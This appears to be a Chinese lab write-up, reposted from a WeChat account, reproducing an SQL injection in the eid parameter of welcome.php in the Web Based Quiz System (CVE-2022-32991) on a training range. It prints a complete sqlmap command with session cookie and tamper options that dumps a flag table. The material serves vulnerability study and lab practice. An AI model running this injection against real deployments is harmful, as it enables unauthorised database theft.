一、项目简介
Web-Base Quiz System是一个基于PHP语言、MYSQL数据库开发的在线考试项目,具有管理员界面和用户界面,在管理员界面可对用户、排名、试题等进行管理,用户界面可进行考试、做题。项目目的是为了节约学生时间。
二、漏洞详情
根据CNVVD官方漏洞介绍,该项目存在SQL注入,注入参数为eid。
Sourcecodester Web Based Quiz System是 (Sourcecodester)开源的一个应用软件。用于一个简单的在线基础的项目。Web Based Quiz System v1.0版本存在安全漏洞,该漏洞源于通过 welcome.php 中的eid 参数发现存在 SQL 注入漏洞。
三、漏洞分析
根据CNVVD漏洞信息,从code-projects上下载项目来分析。我这里使用的是VSCode(YYDS),打开项目文件夹搜索参数“eid”。从搜索结果来看,多处直接将“$eid=@GET["eid"];”拼接到SQL语句中,直接导致SQL注入漏洞。这里我选择welcome.php中一段代码展示。
漏洞点很明显,也不用做过多的解释,数据库使用的是MYSQL。
四、漏洞利用
官方说搭一个XAMPP来运行项目,并给出了详细步骤,我直接利用现在的平台ichunqiu云镜平台。
1.启动云镜容器,访问链接进入Quiz System首页。
2.没有账号,先注册一个账号,并登录就可以访问welcome.php欢迎页。
3.登录成功,进入welcome.php欢迎页面。
点击“Start”按钮,打开链接:
http://eci-2zeepg6h1bnxdldv98ge.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34
对照welcome.php源代码,可以尝试用sqlmap进行注入。
4.sqlmap注入
注意:需要设置sqlmap的--cookie选项为登录后获取的PHPSESSID=xxx
python3 sqlmap.py -u http://eci-2zehop2mrkcpjddd9ea8.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=2&t=34 --dbms=mysql -p eid --cookie="PHPSESSID=ebu54ttcqkgr7p32les7u87rjl" -vv --tamper=space2comment --random-agent --batch -D ctf -T flag --dump
【参考】
- http://123.124.177.30/web/xxk/ldxqById.tag?CNNVD=CNNVD-202206-1479
- https://code-projects.org/online-quiz-system-in-php-with-source-code/ (项目下载地址)
- https://yunjing.ichunqiu.com/ (云镜靶场)
为br
原文始发于微信公众号(一起胖pwn):[漏洞复现]CNNVD-202206-1479(CVE-2022-32991)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论